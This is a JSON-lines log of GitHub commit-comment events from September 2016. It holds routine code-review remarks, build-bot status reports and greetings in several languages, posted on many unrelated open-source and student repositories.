{"id":"4620330349","type":"CommitCommentEvent","actor":{"login":"sypherce"},"repo":{"name":"sypherce/ds2key"},"payload":{"comment":{"id":19179554,"position":16,"line":59,"path":"client/source/gui/rect.cpp","commit_id":"d7f3b573fc889d193dbe25afeabea909637d18b7","created_at":"2016-09-26T20:46:21Z","updated_at":"2016-09-26T20:46:21Z","body":"This line had a bad typo!"}},"created_at":"2016-09-26T20:46:21Z"}
{"id":"4620332190","type":"CommitCommentEvent","actor":{"login":"MarkY-LunarG"},"repo":{"name":"KhronosGroup/Vulkan-LoaderAndValidationLayers"},"payload":{"comment":{"id":19179568,"position":72,"line":4485,"path":"loader/loader.c","commit_id":"87070d81bca386e4a3fb1295e8d7dc232ec48622","created_at":"2016-09-26T20:46:40Z","updated_at":"2016-09-26T20:46:40Z","body":"It's only returning the \"total_gpu_count\" which matches to the size of the instance's physical device array.  This code was already there and I didn't change it.\r\n\r\nThis value is reset every call to vkEnumeratePhysicalDevices and is calculated based on number of physical devices attached to each ICD.   Because it's re-calculated every time, this isn't a problem for storing a stale count."}},"created_at":"2016-09-26T20:46:40Z"}
{"id":"4620333170","type":"CommitCommentEvent","actor":{"login":"FrolovVladimir"},"repo":{"name":"Alex7974115/vkautotest"},"payload":{"comment":{"id":19179571,"position":21,"line":21,"path":"src/test/java/LehaTest2.java","commit_id":"7adc76870e34919c1acd1d0abaee4cf158201a67","created_at":"2016-09-26T20:46:50Z","updated_at":"2016-09-26T20:46:50Z","body":"Слипы плохо!!!\r\nЧитай документацию по ожиданиям http://www.seleniumhq.org/docs/04_webdriver_advanced.jsp\r\nЛибо через  WebDriverWait либо через FluentWait\r\n"}},"created_at":"2016-09-26T20:46:50Z"}
{"id":"4620337247","type":"CommitCommentEvent","actor":{"login":"jamez70"},"repo":{"name":"cyoung/stratux"},"payload":{"comment":{"id":19179580,"position":null,"line":null,"path":null,"commit_id":"8cef4434976f99177fc44652551c328e8c26b084","created_at":"2016-09-26T20:47:34Z","updated_at":"2016-09-26T20:47:34Z","body":"Another use is to set it to the internal gpio heartbeat indicator on linux which will show you CPU load by the blink rate."}},"created_at":"2016-09-26T20:47:34Z"}
{"id":"4620337564","type":"CommitCommentEvent","actor":{"login":"bbashy"},"repo":{"name":"braxtonfair/LaraBin"},"payload":{"comment":{"id":19179584,"position":null,"line":null,"path":null,"commit_id":"bc8bee437f49a1417f2a2de350e768e5ad990181","created_at":"2016-09-26T20:47:38Z","updated_at":"2016-09-26T20:47:38Z","body":"You probably figured this out but github_username was dropped in a migration :)"}},"created_at":"2016-09-26T20:47:38Z"}
{"id":"4620338601","type":"CommitCommentEvent","actor":{"login":"xinzweb"},"repo":{"name":"greenplum-db/gpdb"},"payload":{"comment":{"id":19179588,"position":null,"line":null,"path":null,"commit_id":"fd565de18bfb3c456adbd9a816194ec57efdc502","created_at":"2016-09-26T20:47:50Z","updated_at":"2016-09-26T20:47:50Z","body":"Thanks a lot for the quick fix."}},"created_at":"2016-09-26T20:47:50Z"}
{"id":"4620339838","type":"CommitCommentEvent","actor":{"login":"ericstj"},"repo":{"name":"dotnet/buildtools"},"payload":{"comment":{"id":19179591,"position":5,"line":109,"path":"src/Microsoft.DotNet.Build.Tasks/PackageFiles/FrameworkTargeting.targets","commit_id":"073d09f047bf4d288275e7f9d184da454b4c4ae5","created_at":"2016-09-26T20:48:02Z","updated_at":"2016-09-26T20:48:02Z","body":"I found a way to workaround this, but we should probably fix this.  I think conditioning this fix on SetConfiguration metadata not being set might be the right thing to do."}},"created_at":"2016-09-26T20:48:02Z"}
{"id":"4620340919","type":"CommitCommentEvent","actor":{"login":"FrolovVladimir"},"repo":{"name":"Alex7974115/vkautotest"},"payload":{"comment":{"id":19179594,"position":18,"line":18,"path":"src/test/java/LehaTest2.java","commit_id":"7adc76870e34919c1acd1d0abaee4cf158201a67","created_at":"2016-09-26T20:48:13Z","updated_at":"2016-09-26T20:48:13Z","body":"Элементы, у которых есть id можно сразу искать по нему.\r\nBy.id(\"index_email\") - так короче\r\n"}},"created_at":"2016-09-26T20:48:13Z"}
{"id":"4620345097","type":"CommitCommentEvent","actor":{"login":"zapdos26"},"repo":{"name":"zapdos26/mIRC-TwitchBot"},"payload":{"comment":{"id":19179603,"position":null,"line":null,"path":null,"commit_id":"4ec1f3f1738aada06a42365c898e321f5832d21c","created_at":"2016-09-26T20:48:59Z","updated_at":"2016-09-26T20:48:59Z","body":"Also replaced the Repetition Command with Something Faster"}},"created_at":"2016-09-26T20:48:59Z"}
{"id":"4620346957","type":"CommitCommentEvent","actor":{"login":"atwice"},"repo":{"name":"Izeren/math-redactor"},"payload":{"comment":{"id":19179609,"position":24,"line":24,"path":"formulas-converter/formulas-converter/CSintacticValidationVisitor.cpp","commit_id":"fd51c966fb03316ff377eb405502afff33f79d4a","created_at":"2016-09-26T20:49:18Z","updated_at":"2016-09-26T20:49:18Z","body":"явный delete не нужен почти никогда. Здесь, например, лучше использовать unique_ptr. Еще рассмотрите возможность возвращать результат визита по значению"}},"created_at":"2016-09-26T20:49:18Z"}
{"id":"4620348217","type":"CommitCommentEvent","actor":{"login":"ebrillhart"},"repo":{"name":"FormidableLabs/formidable-playbook-docs"},"payload":{"comment":{"id":19179626,"position":null,"line":null,"path":null,"commit_id":"6efbc8f4577aedd84d3b7b7ff193b48ed2755d7e","created_at":"2016-09-26T20:49:33Z","updated_at":"2016-09-26T20:49:33Z","body":"@paulathevalley @kylecesmat okay! I'll revert back to what we had for right now, and then going forward hitting rebuild sounds great\r\n"}},"created_at":"2016-09-26T20:49:33Z"}
{"id":"4620348228","type":"CommitCommentEvent","actor":{"login":"obenland"},"repo":{"name":"Automattic/wp-calypso"},"payload":{"comment":{"id":19179625,"position":54,"line":54,"path":"client/state/states-list/test/actions.js","commit_id":"2cedce86d1250a54fe011f1438415265b5147655","created_at":"2016-09-26T20:49:33Z","updated_at":"2016-09-26T20:49:33Z","body":"> You'd need to update the failing test to request CA to verify the failure.\r\n\r\n🙈"}},"created_at":"2016-09-26T20:49:33Z"}
{"id":"4620349938","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"shahsarick/dsp"},"payload":{"comment":{"id":19179631,"position":null,"line":null,"path":null,"commit_id":"bfd3ff03345422a6f3528fdc631ef9b7223b01ef","created_at":"2016-09-26T20:49:51Z","updated_at":"2016-09-26T20:49:51Z","body":"RE: 05b-advanced_python.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @rsampath\r\n\r\nHello @shahsarick \r\n\r\nGood work with advanced Python problems. Here are some comments:\r\n- Q2: \"Assistant Professor is Biostatistics\" is clearly a typo, should be counted as \"Assistant Professor of Biostatistics\".\r\n- Q5: Don't forget to `import csv`. Also, your output file contains two extra lines at the top, one with \"0\" and one with \" email\".\r\n- Q6-Q8: The code in `advanced_python_dict.py` is not running for me. It complains that 'facultynames' is not defined."}},"created_at":"2016-09-26T20:49:51Z"}
{"id":"4620352348","type":"CommitCommentEvent","actor":{"login":"Serg-Norseman"},"repo":{"name":"Serg-Norseman/GEDKeeper"},"payload":{"comment":{"id":19179637,"position":null,"line":null,"path":null,"commit_id":"4b1e5b2e542825d4c6d8275e54b3aeea0cf305e6","created_at":"2016-09-26T20:50:17Z","updated_at":"2016-09-26T20:50:17Z","body":"Closed in error as 60 instead of 59. In issues writed comments."}},"created_at":"2016-09-26T20:50:17Z"}
{"id":"4620353039","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19179639,"position":null,"line":null,"path":null,"commit_id":"50907068e7af7cf1b284b7a5463efd62c565d98b","created_at":"2016-09-26T20:50:25Z","updated_at":"2016-09-26T20:50:25Z","body":"license-update (axelstudios) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-50907068e7af7cf1b284b7a5463efd62c565d98b-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-26T20:50:25Z"}
{"id":"4620357778","type":"CommitCommentEvent","actor":{"login":"atwice"},"repo":{"name":"Izeren/math-redactor"},"payload":{"comment":{"id":19179659,"position":4,"line":5,"path":"formulas-converter/formulas-converter/IVisitor.h","commit_id":"fd51c966fb03316ff377eb405502afff33f79d4a","created_at":"2016-09-26T20:51:17Z","updated_at":"2016-09-26T20:51:17Z","body":"возможно, лучше вынести эти объявления в отдельный файл **OperatorsFwd.h**"}},"created_at":"2016-09-26T20:51:17Z"}
{"id":"4620359243","type":"CommitCommentEvent","actor":{"login":"ocj137"},"repo":{"name":"ocj137/DSI-test"},"payload":{"comment":{"id":19179663,"position":null,"line":null,"path":null,"commit_id":"caecfcb04b047f9a711549d8d0fae60c35dd83f7","created_at":"2016-09-26T20:51:33Z","updated_at":"2016-09-26T20:51:33Z","body":"Add this to master as well"}},"created_at":"2016-09-26T20:51:33Z"}
{"id":"4620365740","type":"CommitCommentEvent","actor":{"login":"sethp-jive"},"repo":{"name":"openzipkin/zipkin"},"payload":{"comment":{"id":19179679,"position":72,"line":67,"path":"zipkin-autoconfigure/storage-elasticsearch-aws/src/main/java/zipkin/autoconfigure/storage/elasticsearch/aws/AwsSignatureInterceptor.java","commit_id":"58fa61a78af904dd775dff571e930f95b4e78815","created_at":"2016-09-26T20:52:42Z","updated_at":"2016-09-26T20:52:42Z","body":"I think rethrowing breaks anonymous credentials because the default chain won't provide them – so even for open domain access you'll still have to load in some parse-able credentials (& I've never tried to explicitly configure \"anonymous\"). Otherwise, the last thing the chain does is:\r\n\r\n```\r\n        throw new AmazonClientException(\"Unable to load AWS credentials from any provider in the chain\");\r\n```\r\n\r\nPerhaps the right call is to extend the default chain with a last-resort credentials provider that always returns anonymous credentials? So in lieu of `new DefaultAWSCredentialsProviderChain()`:\r\n\r\n```\r\nnew AWSCredentialsProviderChain(\r\n        new EnvironmentVariableCredentialsProvider(),\r\n        new SystemPropertiesCredentialsProvider(),\r\n        new ProfileCredentialsProvider(),\r\n        new EC2ContainerCredentialsProviderWrapper(),\r\n        new AWSCredentialsProvider() {\r\n          @Override public AWSCredentials getCredentials() {\r\n            return new AnonymousAWSCredentials();\r\n          }\r\n\r\n          @Override public void refresh() { \r\n          }\r\n        })\r\n```"}},"created_at":"2016-09-26T20:52:42Z"}
{"id":"4620367967","type":"CommitCommentEvent","actor":{"login":"atwice"},"repo":{"name":"Izeren/math-redactor"},"payload":{"comment":{"id":19179685,"position":null,"line":null,"path":null,"commit_id":"0689cbda33f54ec1b686a9a6b1b684fe5a5e1687","created_at":"2016-09-26T20:53:08Z","updated_at":"2016-09-26T20:53:08Z","body":"Разве удобно держать заголовочные файлы далеко от файлов реализации?"}},"created_at":"2016-09-26T20:53:08Z"}
{"id":"4620368350","type":"CommitCommentEvent","actor":{"login":"FrolovVladimir"},"repo":{"name":"Alex7974115/vkautotest"},"payload":{"comment":{"id":19179686,"position":24,"line":24,"path":"src/test/java/LehaTest2.java","commit_id":"7adc76870e34919c1acd1d0abaee4cf158201a67","created_at":"2016-09-26T20:53:12Z","updated_at":"2016-09-26T20:53:12Z","body":"Это динамический локатор. Что он находит? Нужно привязать xpath к тексту, или ещё к чему-то.\r\nПотому-что он скоро изменится"}},"created_at":"2016-09-26T20:53:12Z"}
{"id":"4620369830","type":"CommitCommentEvent","actor":{"login":"FrolovVladimir"},"repo":{"name":"Alex7974115/vkautotest"},"payload":{"comment":{"id":19179688,"position":19,"line":19,"path":"src/test/java/LehaTest2.java","commit_id":"7adc76870e34919c1acd1d0abaee4cf158201a67","created_at":"2016-09-26T20:53:30Z","updated_at":"2016-09-26T20:53:30Z","body":"Тоже самое с id"}},"created_at":"2016-09-26T20:53:30Z"}
{"id":"4620370140","type":"CommitCommentEvent","actor":{"login":"jschwartzenberg"},"repo":{"name":"jschwartzenberg/dosemu2"},"payload":{"comment":{"id":19179689,"position":null,"line":null,"path":null,"commit_id":"91c0e4214511c76ca391f660551eeea57dcc8c67","created_at":"2016-09-26T20:53:34Z","updated_at":"2016-09-26T20:53:34Z","body":"Thanks for your comment! I just fixed this and made some changes to autoemu.bat so that D:\\DOS can work with it. Let me know if you think such changes are a good idea or not."}},"created_at":"2016-09-26T20:53:34Z"}
{"id":"4620372777","type":"CommitCommentEvent","actor":{"login":"atwice"},"repo":{"name":"Izeren/math-redactor"},"payload":{"comment":{"id":19179696,"position":16,"line":16,"path":"plotter/MathPlotter/MathPlotter/PlotterWindow.cpp","commit_id":"a89b2892eaec4af4b8ca9793b8a099ace9746d7a","created_at":"2016-09-26T20:54:03Z","updated_at":"2016-09-26T20:54:03Z","body":"Зачем такой деструктор"}},"created_at":"2016-09-26T20:54:03Z"}
{"id":"4620373342","type":"CommitCommentEvent","actor":{"login":"cybrann"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19179697,"position":null,"line":null,"path":null,"commit_id":"017bb8d523773de6f83274aab710b612c9cfd1a3","created_at":"2016-09-26T20:54:10Z","updated_at":"2016-09-26T20:54:10Z","body":"Welcome @Bodeguero "}},"created_at":"2016-09-26T20:54:10Z"}
{"id":"4620374619","type":"CommitCommentEvent","actor":{"login":"Mysterium"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19179698,"position":null,"line":null,"path":null,"commit_id":"017bb8d523773de6f83274aab710b612c9cfd1a3","created_at":"2016-09-26T20:54:24Z","updated_at":"2016-09-26T20:54:24Z","body":"welcome!"}},"created_at":"2016-09-26T20:54:24Z"}
{"id":"4620375714","type":"CommitCommentEvent","actor":{"login":"atwice"},"repo":{"name":"Izeren/math-redactor"},"payload":{"comment":{"id":19179699,"position":65,"line":65,"path":"plotter/MathPlotter/MathPlotter/PlotterWindow.cpp","commit_id":"a89b2892eaec4af4b8ca9793b8a099ace9746d7a","created_at":"2016-09-26T20:54:36Z","updated_at":"2016-09-26T20:54:36Z","body":"зачем метод?"}},"created_at":"2016-09-26T20:54:36Z"}
{"id":"4620389913","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":19179752,"position":53,"line":89,"path":"android/src/com/frostwire/android/gui/adapters/menu/AddToPlaylistMenuAction.java","commit_id":"8ebe6d2d4ac37a15303e39557989a1722354980d","created_at":"2016-09-26T20:57:11Z","updated_at":"2016-09-26T20:57:11Z","body":"LOL."}},"created_at":"2016-09-26T20:57:11Z"}
{"id":"4620391420","type":"CommitCommentEvent","actor":{"login":"ruslangaripov"},"repo":{"name":"Serg-Norseman/GEDKeeper"},"payload":{"comment":{"id":19179753,"position":4,"line":948,"path":"projects/GEDKeeper2/GKUI/BaseWin.cs","commit_id":"7326671438d02cf9c6f0fdac86a847e649c3a4a5","created_at":"2016-09-26T20:57:26Z","updated_at":"2016-09-26T20:57:26Z","body":"Ooops :laughing: I'm sorry for 2-spaces indent!"}},"created_at":"2016-09-26T20:57:26Z"}
{"id":"4620392101","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":19179756,"position":5,"line":38,"path":"android/src/com/frostwire/android/gui/views/AbstractActivity.java","commit_id":"8ebe6d2d4ac37a15303e39557989a1722354980d","created_at":"2016-09-26T20:57:34Z","updated_at":"2016-09-26T20:57:34Z","body":"I think this wasn't meant to be there."}},"created_at":"2016-09-26T20:57:34Z"}
{"id":"4620392209","type":"CommitCommentEvent","actor":{"login":"martinkomitsky"},"repo":{"name":"DmitryDorofeev/webserver"},"payload":{"comment":{"id":19179758,"position":67,"line":67,"path":"server.go","commit_id":"9176783b71fa60d199765c2b29f4dcf9c7e95118","created_at":"2016-09-26T20:57:35Z","updated_at":"2016-09-26T20:57:35Z","body":"zadikies!"}},"created_at":"2016-09-26T20:57:35Z"}
{"id":"4620392897","type":"CommitCommentEvent","actor":{"login":"Bodeguero"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19179761,"position":null,"line":null,"path":null,"commit_id":"017bb8d523773de6f83274aab710b612c9cfd1a3","created_at":"2016-09-26T20:57:42Z","updated_at":"2016-09-26T20:57:42Z","body":"Thanks @cybrann , @Mysterium "}},"created_at":"2016-09-26T20:57:42Z"}
{"id":"4620394539","type":"CommitCommentEvent","actor":{"login":"thopiekar"},"repo":{"name":"onitake/Uranium"},"payload":{"comment":{"id":19179764,"position":null,"line":null,"path":null,"commit_id":"d93728665b83766ea96a2ba89eec2dc3725705c9","created_at":"2016-09-26T20:57:59Z","updated_at":"2016-09-26T20:57:59Z","body":"Why don't you take your time on copying everything to the main tree?\r\nI mean getting an package into Debian's repository doesn't need any debian/* files in the main tree.\r\nJust look at systemd for example. The Debian maintainers are only hosting the packaging files plus a set of patches on their git servers.\r\nIf you are on Debian and want also packages for Debian ( or whatever your reason is ), you should better ask the launchpad.net maintainers whether it isn't possible to enable Debian builds on my PPA.\r\nAnother alternative is OBS, where you could upload the source packages and build packages for any Debian-based distro."}},"created_at":"2016-09-26T20:57:59Z"}
{"id":"4620398976","type":"CommitCommentEvent","actor":{"login":"Izeren"},"repo":{"name":"Izeren/math-redactor"},"payload":{"comment":{"id":19179774,"position":4,"line":5,"path":"formulas-converter/formulas-converter/IVisitor.h","commit_id":"fd51c966fb03316ff377eb405502afff33f79d4a","created_at":"2016-09-26T20:58:49Z","updated_at":"2016-09-26T20:58:49Z","body":"С учетом того, что этот набор forwardDeclarations более нигде использоваться не должен, нет большого смысла выносить его в отдельный h файл, его проще будет забыть при добавлении нового узла, а так хоть в глаза бросается"}},"created_at":"2016-09-26T20:58:49Z"}
{"id":"4620399730","type":"CommitCommentEvent","actor":{"login":"atwice"},"repo":{"name":"team-PowerSpace/PowerSpace"},"payload":{"comment":{"id":19179776,"position":10,"line":10,"path":"PowerSpace/Editor/Editor.vcxproj.filters","commit_id":"e147f54e47c622a49273cb0fd9518a8a32d0a40f","created_at":"2016-09-26T20:58:57Z","updated_at":"2016-09-26T20:58:57Z","body":"разве удобно держать заголовочные файлы далеко от реализации?"}},"created_at":"2016-09-26T20:58:57Z"}
{"id":"4620400067","type":"CommitCommentEvent","actor":{"login":"aldenml"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":19179777,"position":5,"line":38,"path":"android/src/com/frostwire/android/gui/views/AbstractActivity.java","commit_id":"8ebe6d2d4ac37a15303e39557989a1722354980d","created_at":"2016-09-26T20:59:01Z","updated_at":"2016-09-26T20:59:01Z","body":"no idea what happened here"}},"created_at":"2016-09-26T20:59:01Z"}
{"id":"4620404405","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19179789,"position":null,"line":null,"path":null,"commit_id":"50907068e7af7cf1b284b7a5463efd62c565d98b","created_at":"2016-09-26T20:59:45Z","updated_at":"2016-09-26T20:59:45Z","body":"license-update (axelstudios) - i386-Windows-7-VisualStudio-12: Tests Failed (2072 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-50907068e7af7cf1b284b7a5463efd62c565d98b-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-50907068e7af7cf1b284b7a5463efd62c565d98b-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-84.64%25-red.svg)</a> \n"}},"created_at":"2016-09-26T20:59:45Z"}
{"id":"4620404502","type":"CommitCommentEvent","actor":{"login":"jesperorb"},"repo":{"name":"jesperorb/storyteller-by-jesper-orb-fend16"},"payload":{"comment":{"id":19179790,"position":1,"line":1,"path":"1_tale_begins.txt","commit_id":"fe1e3e3572bf06189d2195ff9612e63e013e3a79","created_at":"2016-09-26T20:59:46Z","updated_at":"2016-09-26T20:59:46Z","body":"Really bad start"}},"created_at":"2016-09-26T20:59:46Z"}
{"id":"4620405116","type":"CommitCommentEvent","actor":{"login":"danmakenoise"},"repo":{"name":"Pklong/todo"},"payload":{"comment":{"id":19179792,"position":25,"line":25,"path":"Gemfile","commit_id":"48041dd274972692be7c108f51809d2c45ca8d0a","created_at":"2016-09-26T20:59:53Z","updated_at":"2016-09-26T20:59:53Z","body":"nice."}},"created_at":"2016-09-26T20:59:53Z"}
{"id":"4620406189","type":"CommitCommentEvent","actor":{"login":"Izeren"},"repo":{"name":"Izeren/math-redactor"},"payload":{"comment":{"id":19179796,"position":24,"line":24,"path":"formulas-converter/formulas-converter/CSintacticValidationVisitor.cpp","commit_id":"fd51c966fb03316ff377eb405502afff33f79d4a","created_at":"2016-09-26T21:00:05Z","updated_at":"2016-09-26T21:00:05Z","body":"Пока планируется хранить дерево в куче, поэтому явный delete нужен будет всегда, плюсы и минусы, можно будет обсудить завтра на паре"}},"created_at":"2016-09-26T21:00:05Z"}
{"id":"4620406325","type":"CommitCommentEvent","actor":{"login":"atwice"},"repo":{"name":"team-PowerSpace/PowerSpace"},"payload":{"comment":{"id":19179797,"position":4,"line":4,"path":"PowerSpace/PowerSpace/Drawable.h","commit_id":"e147f54e47c622a49273cb0fd9518a8a32d0a40f","created_at":"2016-09-26T21:00:06Z","updated_at":"2016-09-26T21:00:06Z","body":"I значит \"интерфейс\". Откуда у интерфейса поля-данные?"}},"created_at":"2016-09-26T21:00:06Z"}
{"id":"4620406758","type":"CommitCommentEvent","actor":{"login":"rbnpi"},"repo":{"name":"samaaron/sonic-pi"},"payload":{"comment":{"id":19179799,"position":null,"line":null,"path":null,"commit_id":"687fde45e88b1efe7ad7673971ba67ea4c73b6c3","created_at":"2016-09-26T21:00:12Z","updated_at":"2016-09-26T21:00:12Z","body":"This won't build on my Mac Error is:\r\n```\r\nmainwindow.cpp:1552:18: error: out-of-line definition of 'runBufferIdx' does not\r\n      match any declaration in 'MainWindow'\r\nvoid MainWindow::runBufferIdx(int idx)\r\n```"}},"created_at":"2016-09-26T21:00:12Z"}
{"id":"4620407342","type":"CommitCommentEvent","actor":{"login":"courtney-g"},"repo":{"name":"KhronosGroup/Vulkan-LoaderAndValidationLayers"},"payload":{"comment":{"id":19179800,"position":72,"line":4485,"path":"loader/loader.c","commit_id":"87070d81bca386e4a3fb1295e8d7dc232ec48622","created_at":"2016-09-26T21:00:17Z","updated_at":"2016-09-26T21:00:17Z","body":"Okay, it's being reset for each call, so not a bug.\r\n\r\nYeah, I saw that this was in the old code. Don't think it's necessary. Since it's reset, it doesn't hurt anything but it's not clear that it's providing any value either.\r\n"}},"created_at":"2016-09-26T21:00:17Z"}
{"id":"4620408546","type":"CommitCommentEvent","actor":{"login":"lsmithrodriguez"},"repo":{"name":"lsmithrodriguez/skillcrush-104"},"payload":{"comment":{"id":19179805,"position":null,"line":null,"path":null,"commit_id":"d0cbed9c0e2e8a7666cdeed950462e658e46f9fe","created_at":"2016-09-26T21:00:30Z","updated_at":"2016-09-26T21:00:30Z","body":"Some advice about Cooking/Eating"}},"created_at":"2016-09-26T21:00:30Z"}
{"id":"4620409946","type":"CommitCommentEvent","actor":{"login":"Izeren"},"repo":{"name":"Izeren/math-redactor"},"payload":{"comment":{"id":19179810,"position":7,"line":7,"path":"formulas-converter/formulas-converter/CSintacticValidationVisitor.cpp","commit_id":"fd51c966fb03316ff377eb405502afff33f79d4a","created_at":"2016-09-26T21:00:44Z","updated_at":"2016-09-26T21:00:44Z","body":"Пока он пустой, а вдруг его захочется дополнить, например, добавить туда список имен переменных, от которых должна зависеть формула"}},"created_at":"2016-09-26T21:00:44Z"}
{"id":"4620411248","type":"CommitCommentEvent","actor":{"login":"atwice"},"repo":{"name":"team-PowerSpace/PowerSpace"},"payload":{"comment":{"id":19179812,"position":3,"line":3,"path":"PowerSpace/PowerSpace/Script.h","commit_id":"5443a7a341cd2b0db399a27432eb80bc5dc6ab18","created_at":"2016-09-26T21:00:59Z","updated_at":"2016-09-26T21:00:59Z","body":"вот это хороший интерфейс"}},"created_at":"2016-09-26T21:00:59Z"}
{"id":"4620411914","type":"CommitCommentEvent","actor":{"login":"aekeus"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19179814,"position":null,"line":null,"path":null,"commit_id":"34e66597b3dd713541ef1d1666f20c6131164a50","created_at":"2016-09-26T21:01:06Z","updated_at":"2016-09-26T21:01:06Z","body":"++"}},"created_at":"2016-09-26T21:01:06Z"}
{"id":"4620416186","type":"CommitCommentEvent","actor":{"login":"Izeren"},"repo":{"name":"Izeren/math-redactor"},"payload":{"comment":{"id":19179823,"position":16,"line":16,"path":"plotter/MathPlotter/MathPlotter/PlotterWindow.cpp","commit_id":"a89b2892eaec4af4b8ca9793b8a099ace9746d7a","created_at":"2016-09-26T21:01:52Z","updated_at":"2016-09-26T21:01:52Z","body":"Опять же, вдруг его захочется дополнить"}},"created_at":"2016-09-26T21:01:52Z"}
{"id":"4620417446","type":"CommitCommentEvent","actor":{"login":"atwice"},"repo":{"name":"team-PowerSpace/PowerSpace"},"payload":{"comment":{"id":19179826,"position":9,"line":9,"path":"PowerSpace/Editor/Editor.cpp","commit_id":"0b724016b9cc15bacbc3156ee8d8ea8834b7dce6","created_at":"2016-09-26T21:02:06Z","updated_at":"2016-09-26T21:02:06Z","body":"настройте, пожалуйста, кодировку исходников, чтобы в GitHub нормально отображалась"}},"created_at":"2016-09-26T21:02:06Z"}
{"id":"4620423439","type":"CommitCommentEvent","actor":{"login":"rabarona"},"repo":{"name":"Open-Network-Insight/oni-ml"},"payload":{"comment":{"id":19179841,"position":null,"line":null,"path":null,"commit_id":"c803935d5cffefe9f22fce84cdda3c43f4e42848","created_at":"2016-09-26T21:03:10Z","updated_at":"2016-09-26T21:03:10Z","body":"This looks goog. As per DNS everything looks good. \r\nThe only comment is Proxy is still using `topicCount = 20`. I understand if that change should go into another PR. I'm mentioning this just to keep track on that. "}},"created_at":"2016-09-26T21:03:10Z"}
{"id":"4620425741","type":"CommitCommentEvent","actor":{"login":"brussee"},"repo":{"name":"csrdelft/csrdelft.nl"},"payload":{"comment":{"id":19179848,"position":null,"line":null,"path":null,"commit_id":"c5e240df55a592f78f54410765af1a5722d5c19d","created_at":"2016-09-26T21:03:35Z","updated_at":"2016-09-26T21:03:35Z","body":"Dit #133"}},"created_at":"2016-09-26T21:03:35Z"}
{"id":"4620426280","type":"CommitCommentEvent","actor":{"login":"atwice"},"repo":{"name":"team-PowerSpace/PowerSpace"},"payload":{"comment":{"id":19179852,"position":10,"line":10,"path":"PowerSpace/Editor/DrawableEditor.cpp","commit_id":"a6880ce8bb27bf4f82688a276a6da41acc68e99f","created_at":"2016-09-26T21:03:41Z","updated_at":"2016-09-26T21:03:41Z","body":"а почему эти переменные не в списке инициализации?"}},"created_at":"2016-09-26T21:03:41Z"}
{"id":"4620426379","type":"CommitCommentEvent","actor":{"login":"gilglecio"},"repo":{"name":"davidsadan/blog-prova-edson-queiroz"},"payload":{"comment":{"id":19179853,"position":null,"line":null,"path":null,"commit_id":"45a82b6701716be9b5d057b655d245067fd7272d","created_at":"2016-09-26T21:03:41Z","updated_at":"2016-09-26T21:03:41Z","body":"@davidsadan por que vc envia os arquivo em ZIP?"}},"created_at":"2016-09-26T21:03:41Z"}
{"id":"4620427744","type":"CommitCommentEvent","actor":{"login":"atwice"},"repo":{"name":"team-PowerSpace/PowerSpace"},"payload":{"comment":{"id":19179857,"position":18,"line":18,"path":"PowerSpace/Editor/DrawableEditor.cpp","commit_id":"a6880ce8bb27bf4f82688a276a6da41acc68e99f","created_at":"2016-09-26T21:03:56Z","updated_at":"2016-09-26T21:03:56Z","body":"зачем такой деструктор?"}},"created_at":"2016-09-26T21:03:56Z"}
{"id":"4620427903","type":"CommitCommentEvent","actor":{"login":"UserTestLogtrust1"},"repo":{"name":"UserTestLogtrust1/PS_LG"},"payload":{"comment":{"id":19179858,"position":null,"line":null,"path":null,"commit_id":"b092244d553dbc622de6dfd9cf68987a0333e171","created_at":"2016-09-26T21:03:58Z","updated_at":"2016-09-26T21:03:58Z","body":"0_PS_LG: commit inicial"}},"created_at":"2016-09-26T21:03:58Z"}
{"id":"4620431270","type":"CommitCommentEvent","actor":{"login":"HemeryJu"},"repo":{"name":"supelec-lstm/PinaPL"},"payload":{"comment":{"id":19179862,"position":6,"line":5,"path":"README.md","commit_id":"96999c496fc3662f287c9ee4f80e636d1a1088ff","created_at":"2016-09-26T21:04:35Z","updated_at":"2016-09-26T21:04:35Z","body":"Feel the irony :)"}},"created_at":"2016-09-26T21:04:35Z"}
{"id":"4620432109","type":"CommitCommentEvent","actor":{"login":"yadercode"},"repo":{"name":"yadercode/parcial_kleiver"},"payload":{"comment":{"id":19179867,"position":null,"line":null,"path":null,"commit_id":"a96deab1a6cf242d9bf21f927c05c689a58f1866","created_at":"2016-09-26T21:04:44Z","updated_at":"2016-09-26T21:04:44Z","body":"parcial\r\n"}},"created_at":"2016-09-26T21:04:44Z"}
{"id":"4620432432","type":"CommitCommentEvent","actor":{"login":"atwice"},"repo":{"name":"team-PowerSpace/PowerSpace"},"payload":{"comment":{"id":19179869,"position":88,"line":88,"path":"PowerSpace/Editor/DrawableEditor.cpp","commit_id":"a6880ce8bb27bf4f82688a276a6da41acc68e99f","created_at":"2016-09-26T21:04:48Z","updated_at":"2016-09-26T21:04:48Z","body":"Возможно, тут С - русская"}},"created_at":"2016-09-26T21:04:48Z"}
